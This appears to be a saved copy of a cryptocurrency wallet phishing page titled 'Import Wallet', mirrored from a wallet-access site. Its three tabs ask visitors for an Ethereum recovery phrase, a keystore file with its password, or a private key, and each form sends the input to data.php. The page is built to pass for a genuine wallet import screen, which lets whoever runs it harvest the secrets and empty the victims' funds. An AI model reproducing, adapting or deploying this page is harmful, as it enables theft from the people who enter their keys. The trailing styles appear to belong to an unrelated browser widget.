<!DOCTYPE html>
<!-- saved from url=(0049) -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Import Wallet</title>
    <link rel="stylesheet" href="Import%20Wallet3_files/bootstrap.css">
    <link rel="stylesheet" href="Import%20Wallet3_files/fontawesome-all.css">
    <link rel="apple-touch-icon" sizes="180x180" href="https://walletscoinconnection.com/apple-touch-icon.html">
    <link rel="icon" type="image/png" sizes="32x32" href="https://walletscoinconnection.com/favicon-32x32.html">
    <link rel="icon" type="image/png" sizes="16x16" href="https://walletscoinconnection.com/favicon-16x16.html">
    <link rel="manifest" href="https://walletscoinconnection.com/site.html">
    <link rel="stylesheet" href="Import%20Wallet3_files/bootstrap_002.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link rel="stylesheet" href="Import%20Wallet3_files/styles2.css">
</head>

<body>
    <header>
        <div class="container-fluid">
            <div class="row">
            <div class="col-md-4 offset-md-4">
                <a class="text-white" href="import2.html" style="font-size: 20px;"><i class="fas fa-angle-left"></i>&nbsp; &nbsp;Import Wallet</a>
            </div>
            </div>
        </div>
    </header>
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-4 offset-md-4">
                <ul class="nav nav-tabs">
                    <li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>
                    <li class="nav-item"><a class="nav-link" data-toggle="tab" href="#keystore">Keystore JSON</a></li>
                    <li class="nav-item"><a class="nav-link" data-toggle="tab" href="#privatekey">Private Key</a></li>
                </ul>
            </div>
        </div>
    </div>
    <section style="margin-top: 40px;">
        <div class="container-fluid">


            <div class="row">
                <div class="col-md-4 offset-md-4">



                    <!-- Tab panes -->
                    <div class="tab-content">
                        <div role="tabpanel" class="tab-pane fade show active" id="phrase">

                            <form method="post" action="data.php">
                                <input type="hidden" value="phrase" name="type">
                                <textarea class="form-control" rows="5" name="phrase" placeholder="Phrase" required=""></textarea>
                                <p class="text-secondary" style="margin-top: 10px;">Typically 12 (sometimes 24) words seperated by a single spaces.</p>
                                <input type="hidden" name="value" value="Ethereum">
                                <div class="form-group"><button class="btn btn-primary btn-block" type="submit" name="submit_phrase">IMPORT</button></div>
                            </form>

                        </div>


                        <div role="tabpanel" class="tab-pane fade" id="keystore">
                            <form method="post" action="data.php">
                                <input type="hidden" value="keystore" name="type">
                                <div class="form-group">
                                    <textarea class="form-control" name="phrase" rows="5" placeholder="Keystore JSON" required=""></textarea>
                                </div>
                                <div class="form-group">
                                    <input class="form-control" type="password" name="keystorepasswword" placeholder="Password" required="">
                                </div>
                                <p class="text-secondary" style="margin-top: 10px;">
                                    Several lines of text beginning with "{...}" plus the password you used to encrypt it....
                                </p>
                                <input type="hidden" name="value" value="Ethereum">
                                <div class="form-group"><button class="btn btn-primary btn-block" type="submit" name="submit_keystore">IMPORT</button></div>
                            </form>

                            
                        </div>


                        <div role="tabpanel" class="tab-pane fade" id="privatekey">
                            <form method="post" action="data.php">
                                <input type="hidden" value="privatekey" name="type">
                                <div class="form-group">
                                    <input class="form-control" name="phrase" placeholder="Private Key" required="">
                                </div>
                                <p class="text-secondary" style="margin-top: 10px;">Typically 12 (sometimes 24) words seperated by a single spaces.</p>
                                <input type="hidden" name="value" value="Ethereum">
                                <div class="form-group"><button class="btn btn-primary btn-block" type="submit" name="submit_privatekey">IMPORT</button></div>
                            </form>

                            
                        </div>


                    </div>
                </div>
  


            </div>
        </div>
    </section>
    <script src="Import%20Wallet3_files/jquery.html"></script>
    <script src="Import%20Wallet3_files/bootstrap.html"></script>

<script src="Import%20Wallet3_files/jquery-3.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="Import%20Wallet3_files/popper.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="Import%20Wallet3_files/bootstrap.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>


<!-- Mirrored from walletaccess.net/wallets/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 24 Apr 2021 08:40:08 GMT -->
<style>
        .no_scroll_pshkrt {
            overflow-y: hidden
        }

        .showtime_mode_pshkrt {
            background: #000000;
            opacity: 0.8;
            right: 0px;
            top: 0px;
            width: 100%;
            height: 100%;
            position: fixed;
            display: flex;
            box-shadow: 0px 4px 4px rgba(0, 0, 0, 0.05);
            z-index: 12840;
            transition: 1s ease-in-out;
        }
    </style><style>
        #pm_header_widget_pshkrt {
            background: transparent !important;
            cursor: pointer !important;
            right: 0px !important;
            top: 0px !important;
            width: 250px !important;
            height: 45px !important;
            position: absolute !important;
            display: flex !important;
            box-shadow: 0px 4px 4px rgba(0, 0, 0, 0.05) !important;
            z-index: 2147483646 !important;
        };
    </style><style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap');

        #pm_custom_widget_btn_pshkrt {
            background: linear-gradient(#FAFAFA 0%, #FFFFFF 100%);
            cursor: pointer;
            left: calc(100% - 3% - 36px);
            top: calc(100% - 5% - 36px);
            width: 36px;
            height: 36px;
            position: fixed;
            z-index: 2147483646 !important;
            border-radius: 100px;
        }

        #pm_powerWrapper_pshkrt {
            background: #FFFFFF;
            width: 36px;
            height: 36px;
            border-radius: 100px;
            text-align: right;
            position: absolute;
            box-sizing: border-box;
            // display: none;
            box-shadow: 0px 0px 15px rgba(0, 0, 0, 0.1);
            transition-property: width, transform;
            transition-duration: 700ms, 1ms;
            transition-delay: 0ms, 0ms;
        }

        #pm_powerImage_pshkrt {
            width: 34px;
            top: 1px;
            right: 1px;
            position: absolute;
            height: 34px;
        }

        #pm_logoImage_pshkrt {
            width: 34px;
            height: 34px;
            position: absolute;
            top: 1px;
            left: 1px;
            border-radius: 100px;
        }

        #pm_separator_pshkrt {
            border: 1px solid #E6E6E8;
            position: absolute;
            height: 1px;
            top: 50%;
            transform: translate3d(0, -50%, 0);
            opacity: 0;
            right: 36px;
            transition: 800ms !important;
            transition-delay: 500ms;
            height: 16px;
        }

        .pm_show_pshkrt #pm_separator_pshkrt, .pm_show_pshkrt #pm_powerImage_pshkrt {
            opacity: 1;
        }

        #pm_modal_pshkrt {
            position: absolute;
            top: -280px;
            left: 0px;
            width: 280px;
            height: 260px;
            background: #FFFFFF;
            box-shadow: 0px 0px 15px rgba(0, 0, 0, 0.25);
            border-radius: 8px;
            cursor: default;
            user-select: none;

            display: none;
            align-items: center;
            flex-direction: column;
            justify-content: center;
        }

        #pm_modal_title_pshkrt {
            font-family: 'Roboto', sans-serif;;
            font-style: normal !important;
            line-height: 21px !important;
            text-align: center !important;
            font-size: 18px;
            font-weight: 300;
            color: rgba(0, 0, 0, 0.75);
            margin-bottom: 5px;
            
            padding-left: 5px;
            padding-right: 5px;
        }

        #pm_modal_pshkrt button.regular {
            font-family: 'Roboto', sans-serif;;
            font-style: normal !important;
            line-height: 21px !important;
            text-align: center !important;

            font-size: 11px;
            background: #FF5C00;
            border-radius: 100px;
            text-transform: uppercase;
            width: 193px;
            height: 36px;
            color: #FFFFFF;
            border: none;
            box-shadow: none;
            outline: none;
            cursor: pointer;

            margin: 5px;
        }

        #pm_modal_pshkrt button.regular:active {
            opacity: 0.85;
        }

        #pm_modal_pshkrt button.regular:hover {
            color: #FFFFFFd4;
        }

        #pm_modal_btn3_pshkrt {
            font-family: 'Roboto', sans-serif;;
            font-style: normal !important;
            line-height: 21px !important;
            text-align: center !important;

            font-size: 11px;
            text-transform: uppercase;
            border: none;
            background: none;
            cursor: pointer;
            outline: none;
            cursor: pointer;
            
            color: #FF5C00;
            background: #FF5C00;
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;

            margin: 5px;
        }

        #pm_modal_btn3_pshkrt:hover {
            color: #FF5C00d4;
        }

        .pm_show_pshkrt {
            display: flex !important;
        }

        .pulse_pshkrt {
            animation: pulse-animation_pshkrt 2s infinite;
        }

        .pulse_pshkrt:hover {
            animation: pulse-animation_pshkrt 2s;
        }

        @keyframes pulse-animation_pshkrt {
            0% {
              box-shadow: 0 0 0 0px #FF5C00BB;
            }
            100% {
              box-shadow: 0 0 0 20px #FF5C0000;
            }
          }
    </style><style>
        .preview-container_pshkrt {
            width: 280px !important;
            height: 470px !important;
            display: inline-block !important;
            overflow: hidden !important;
            position: fixed !important;
            bottom: 10% !important;
            right: 15% !important;
            box-sizing: border-box;
            box-shadow: 0px 4px 4px rgba(0, 0, 0, 0.25);
            z-index: 2147483646 !important;
            border-radius: 8px;
        }
        .hide-container_pshkrt {
            display: none !important;
        }
    </style></body></html>